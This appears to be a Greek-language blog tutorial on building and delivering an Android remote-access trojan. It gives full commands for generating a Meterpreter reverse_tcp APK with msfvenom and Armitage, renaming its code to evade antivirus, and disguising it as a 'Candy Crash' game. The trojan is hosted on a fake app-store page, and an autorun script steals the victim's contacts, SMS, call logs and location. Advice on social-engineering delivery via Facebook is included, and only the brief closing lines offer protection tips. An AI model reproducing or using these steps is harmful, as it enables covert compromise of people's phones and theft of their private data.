Τι θα χρειαστειτε;
1.Kali Linux 2.0
2.Eνα δωρεαν domain
Κανουμε εγγραφη ενος domain πχ πατηστε εδω
οταν τελειωσουμε με την εγγραφη τοτε πηγαινουμε και γραφουμε τι ονομα θελουμε να εχει το domain μας
πχ
το ονομα που εδωσα στο domain μου ειναι googleapps-store.ga
εσεις βαζετε οτι θελετε
οταν κανετε checkout κτλ πηγαινουμε στα domains , Mydomains και επιλεγουμε Manage Domain
μετα
βαζουμε την εξωτερικη μας ip και επιλεγουμε save changes
τωρα αυτο που καναμε ειναι
οταν καποιος παει στο http://googleapps-store.ga
θα κατευθυνετε στην εξωτερικη μας ip
συνεχιζουμε
ανοιγουμε ενα τερματικο και γραφουμε
service postgresql start
μετα επιλεγουμε το εικονιδο του armitage αριστερα της οθονης
επιλεγουμε connect
επιλεγουμε yes
περιμενουμε να μας ανοιξει
οταν μας ανοιξει το armitage στην αναζητηση γραφουμε
android reverse_tcp
επιλεγουμε με διπλο κλικ meterpreter reverse_tcp
στο LHOST βαζουμε το ονομα του domain που φτιαξαμε και μια θυρα που θελουμε να επικοινωνει στο output βαζουμε raw και επιλεγουμε Launch
δινουμε ενα ονομα πχ ios.apk και επιλεγουμε save
το armitage εχει φτιαξει την ιο στην διαδρομη Home(root)
ξανα επιλεγουμε android meterpreter reverse_tcp και βαζουμε μονο την θυρα που βαλαμε οταν φτιαξαμε τον ιο πχ 8888 και επιλεγουμε Launch
και το armitage ακουει για καποια συνδεση
τωρα αν μεταφερετε τον ιο στην συσκευη και το τρεξετε σας θα δειτε οτι εμφανιζετε ενα αχαρο εικονιδιο συν αν εχετε καποιο antivirus θα σας το βγαλει σαν ιο .
πχ
οι πληροφοριες που μας βγαζει το antivirus
και βλεπετε οτι 30 απο τα 35 antivirus βρισκουνε τον ιο μας
αν δεν εχουμε καποιο antivirus και παμε να κανουμε την εγκατασταση
τοτε θα δουμε αυτο
οταν τελειωσετε με την εγκατασταση τοτε θα δειτε αυτο
αν το τρεξετε θα δειτε οτι δεν σας ανοιγει κατι αλλα σας εμφανιζει στο armitage το κινητο σας
οπως καταλαβαινετε σε πραγματικες συνθηκες το θυμα σας δεν θα το τρεξει καν
οποτε για να λυσουμε αυτο το προβλημα θα εφαρμοσουμε αντιστροφη μηχανικη
το εργαλειο που θα χρησιμοποιησουμε ειναι το apktool
το apktool ειναι ενα εργαλειο το οποιο κανει αποσυμπιληση και συμπιληση σε εφαρμογες android ωστε να δειτε ενμερη τον κωδικα και να τον τροποποιησετε
οποτε περνουμε το αρχειο ios.apk που εχουμε φτιαξει
(αν θελετε μπορειτε να φτιαξετε γρηγορα με την εντολη
msfvenom -p android/meterpreter/reverse_tcp --platform android --arch dalvik LHOST="googleapps-store.ga" LPORT=8888 R > ios.apk )
οποτε τωρα για να κανουμε αποσυμπιληση(decompiled) του αρχειου γραφουμε
apktool.jar d ios.apk η (apktool d ios.apk)
*αν εχετε προβλημα με το apktool τοτε ακολουθηστε αυτο τον οδηγο εδω
στην διαδρομη Home(root) μας δημιουργησε εναν φακελο με το ονομα ios
εμεις τωρα για να παρακαμψουμε το antivirus θα παμε στον φακελο smali - metasploit και θα αλλαξουμε το ονομα απο metasploit σε οτι θελουμε πχ κατι που να συσχετιζει την εφαρμογη μας αν δεν εχετε αποφασισει ονομαστε το app
τωρα πηγαινουμε στον φακελο stage
εδω θα ανοιξουμε ενα ενα ολα τα αρχεια με leafpad και θα αλλαξουμε το metasploit σε app πχ
και
για να το κανουμε αυτο ποιο γρηγορα ανοιγουμε με leafpad ενα ενα τα αρχεια .smali παταμε ctrl+r γραφουμε πανω metasploit απο κατω app επιλεγουμε Replace all at once μετα find and Replace επειτα παταμε ctrl+s για να αποθηκευση και ctrl+q για να κλεισει το κανουμε σε ολα τα αρχεια που βρισκοντε στον φακελο stage
οταν τελειωσουμε παμε στον αρχικο φακελο ios και ανοιγουμε το αρχειο androidmanifest.xml και αλλαζουμε παλι metasploit σε app
με αυτο τον τροπο οταν συμπιλησουμε (compiled)την εφαρμογη τοτε θα εχουμε παρακαμψει ολα τα antivirus
τωρα μας μενει να αλλαξουμε το εικονιδιο και το ονομα της εφαρμογης ωστε να ειναι ποιο πειστικη
καθως εχουμε ανοικτο το androidmanifest.xml
κανουμε τις εξεις αλλαγες
<application android:label="@string/app_name">
σε
<application android:label="Candy Crash" android:icon="@drawable/icon">
και
<activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
σε
<activity android:label="Candy Crash" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
αποθηκευουμε και κλεινουμε το androidmanifest.xml
πηγαινουμε στον φακελο res και δημιουργουμε
3ς φακελους με τα εξεις ονοματα
drawable-hdpi-v4
drawable-ldpi-v4
drawable-mdpi-v4
μεσα στους φακελους θα βαλουμε την εικονα που θελουμε να δειχνει η εφαρμογη μας πχ
στον φακελο drawable-mdpi-v4 η εικονα που πρεπει να βαλουμε πρεπει να εχει ονομα icon.png και να εχει διαστασεις 48x48
στον φακελο drawable-ldpi-v4 36x36
και στον φακελο drawable-hdpi-v4 72x72
για να το κανουμε αυτο εφοσον ονομασαμε την εφαρμογη μας Candy crash κανουμε αναζητηση για εικονες Candy crash σε .png και τις διαστασεις
πχ
γραφουμε candy crash.png και επιλεγουμε εικονες
μετα πηγαινουμε στα εργαλεια αναζητησης επιλεγουμε μεγεθος και ακριβως
βαζουμε τις διαστασεις και κατεβαζουμε την εικονα
της αλλαζουμε ονομα σε icon.png και την αποθηκευουμε στον αναλογο φακελο
τωρα ειμαστε ετοιμοι να κανουμε compiled τον ιο
για να το κανουμε αυτο
τρεχουμε την εντολη
apktool.jar b /root/ios
τωρα για να μπορεσει καποιος να τρεξει την εφαρμογη μας πρεπει να την υπογραψουμε
πριν την υπογραψουμε πρεπει να δημιουργησουμε την ψηφιακη μας υπογραφη
τρεχουμε την εντολη
keytool -genkey -v -keystore ypografh.keystore -alias nickthesail0r -keyalg RSA -keysize 2048 -validity 10000
τα κοκκινα γραμματα τα αλλαζετε
θα μας ζητησει να βαλουμε κωδικο και μετα τα στοιχεια της υπογραφης πχ ονομα,χωρα,οργανισμο κτλ οταν τελειωσετε γραφετε yes και enter
στην διαδρομη Home(root) θα σας εχει δημιουργηθει το αρχειο ypografh.keystore
τωρα εφοσον φτιαξαμε την υπογραφη πρεπει να υπογραψουμε την εφαρμογη ios.apk
οποτε τρεχουμε την εντολη
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore ypografh.keystore /root/ios/dist/ios.apk nickthesail0r
βαζουμε τον κωδικο που βαλαμε οταν φτιαξαμε την υπογραφη και υπογραφουμε την εφαρμογη
εχουμε τελειωσει τον ιο θα τον βρουμε στην διαδρομη /root/ios/dist/
αν θελετε τρεξτε το αρχειο για να δειτε αν δεν εχετε κανει καποιο λαθος κτλ
τωρα μας μενει να εφαρμοσουμε κοινωνικη μηχανικη
αλλαζουμε τo αρχειο ios.apk σε candycrash.apk πχ
και με την εντολη mv /root/ios/dist/candycrash.apk /var/www/html το μεταφερουμε στην διαδρομη του apache server μας
μετα γραφουμε στο τερματικο leafpad /var/www/html/index.html
και γραφουμε τον παρακατω κωδικα html
<html><head></script></head><div align="center" id="flashDiv" style="position:absolute; top:0%; left:0%; z-index:1;"><a target="_blank" href="http://googleapps-store.ga/ios.apk">
<img src="http://googleapps-store.ga/1.jpg"><meta name="viewport" content="width=device-width" content="hight=device-hight" scale=user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true"></a>
</div></html>
αποθηκευουμε
απο το κινητο μας πηγαινουμε στο play store και κανουμε αναζητηση candy crash
και παιρνουμε ενα στιγμιοτυπο της οθονης μας πχ
τις μεταφερουμε στον υπολογιστη μας
κανουμε εγκατασταση του GIMP (προγραμμα επεξεργασιας φωτογραφιων)
apt-get install gimp
οταν γινει η εγκατασταση ανοιγουμε την εικονα με το gimp
και προσεκτικα σβηνουμε οτι προδιδει οτι ειναι τραβηγμενο απο κινητο
μεχρι να εχουμε περιπου το παρακατω αποτελεσμα
αποθηκευουμε σε 1.jpg και το μεταφερουμε στην διαδρομη /var/www/html/
τωρα σηκωνουμε τον apache server μας με την εντολη
service apache2 start
οταν γραψουμε το domain μας πχ http://googleapps-store.ga στο κινητο μας πρεπει να μας εμφανισει αυτο
*μην ξεχασετε να εχετε προωθησει στο router σας την θυρα 80 για τον apache web server και 8888 που θα ακουει το armitage
πριν το στειλουμε στο θυμα μας γραφουμε την εντολη
leafpad entoles.rc
και βαζουμε μεσα τις παρακατω εντολες
dump_calllog
dump_contacts
dump_sms
wlan_geolocate
αποθηκευουμε μετα παμε στο armitage και γραφουμε
set AutoRunScript multi_console_command -rc /root/entoles.rc
μετα στην διπλα καρτελα που ακουει για το θυμα γραφουμε rexploit -j
το θυμα οταν τρεξει τον ιο αυτοματα το armitage θα εκτελεσει τις ποιο πανω εντολες που βαλαμε στο αρχειο entoles.rc ετσι θα εχουμε παρει γρηγορα τις επαφες ,τα sms ,τις τηλεφωνικες κλησεις του και την τοποθεσια που βρισκετε το θυμα
*εσεις μπορειτε να βαλετε οτι θελετε πχ να παρετε καποιο αρχειο,να ηχογραφησετε ,να παρετε καποια ληψη απο την καμερα κτλ
τωρα το στελνετε στο θυμα ΟΤΑΝ δειτε οτι στην συνομιλια στο facebook λεει οτι ειναι συνδεδεμενος απο κινητο
Δειγμα περιπου πως θα το πλασαρετε στο θυμα
το θυμα παει στην σελιδα, οπουδηποτε και να πατησει θα του κατεβει ο ιος
oταν παει να κανει εγκατασταση θα δει αυτο
και οταν το τρεξει τοτε θα δειτε το θυμα στο armitage
αυτοματα εχετε παρει ηδη επαφες,μνμ,κλησεις και τοποθεσια
οι επαφες, μνμ ,κλησεις κτλ αποθηκευονται στην διαδρομη
/usr/share/armitage
πχ το αρχειο κλησεων
μετα εδω μπορειτε να κανετε οτι θελετε βεβαια το θυμα θα διαγραψει την εφαρμογη εφοσον δεν θα εχει καποια χρηση κτλ
ομως εσεις την κανατε την δουλεια σας
Σε αυτο τον οδηγο απλα μαθαμε πως να κανουμε στην ουσια εναν ιο να φαινεται πειστικος ,σε επομενο οδηγο θα μαθουμε πως κανουμε inject σε οποια εφαρμογη θελουμε.
Πως θα προστατευτειτε;
Ποτε μην κανετε εγκατασταση εφαρμογων απο αγνωστες πηγες
Βεβαια ακομα και να κανετε εγκατασταση καποιας εφαρμογης απο το
play store παντα να κοιτατε τι δικαιωματα εχει η εφαρμογη πχ μια εφαρμογη αριθμομηχανης δεν πρεπει να εχει δικαωματα να κανει αναγνωση βιντεο , φωτογραφιων να κοιταει κλησεις,μνμ κτλ
Αυτο το κομματι θα το δουμε σε επομενο οδηγο
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου